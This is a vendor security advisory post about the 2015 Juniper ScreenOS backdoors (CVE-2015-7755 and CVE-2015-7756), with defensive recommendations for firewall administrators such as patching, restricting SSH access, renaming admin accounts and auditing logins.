UPDATE: As of December 23rd, we have learned that even when the usernames are changed on an unpatched Juniper product, the device can still be compromised. Therefore, it is urgent that Juniper customers patch their devices immediately.
On December 17, Juniper Networks disclosed two backdoors in its ScreenOS software, which runs on its NetScreen Series enterprise firewalls.
The first backdoor (CVE-2015-7755) allows an attacker to log in with a hardcoded password using any existing user name via SSH or Telnet. The other (CVE-2015-7756) enables a “knowledgeable attacker” to decrypt VPN connections. (Details from Juniper can be found here: http://forums.juniper.net/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554).
Juniper claims the discovery was made during a routine review of its software code. It is likely that some adversary has been caught using these backdoors, but we will probably never know for sure. Given the nature of these backdoors, it is unlikely that Juniper is the only security vendor affected. For this reason, all security products (i.e., not just Juniper) should be considered suspect.
Why the backdoors were in the software—and how they got there—are secondary concerns from NSS’ perspective. The most important question security administrators should be asking is “What do we do now?”.
NSS advises the following actions:
- Juniper customers should immediately patch the impacted systems.
- All administrators should limit remote access to their firewalls via SSH (not just Juniper clients).
- All administrators should change administrative login usernames and ensure they are nonspecific or hard to guess (i.e., rename “root” and “admin” to “Th1$is8AD”). This is especially critical for Juniper customers that are unable to patch immediately.
- Use Metasploit (or any other pen test tool) to confirm you have closed the backdoors.
- Educate your network teams about the issue. Don’t assume networking teams understand or track these issues with the same intensity as security teams.
- Confirm all administrator-level accounts on security products are legitimate. (Often attackers will create their own logins once they’ve gained administrative credentials so patching alone won’t remove access.)
If you have additional questions, please reach out. We are here to help.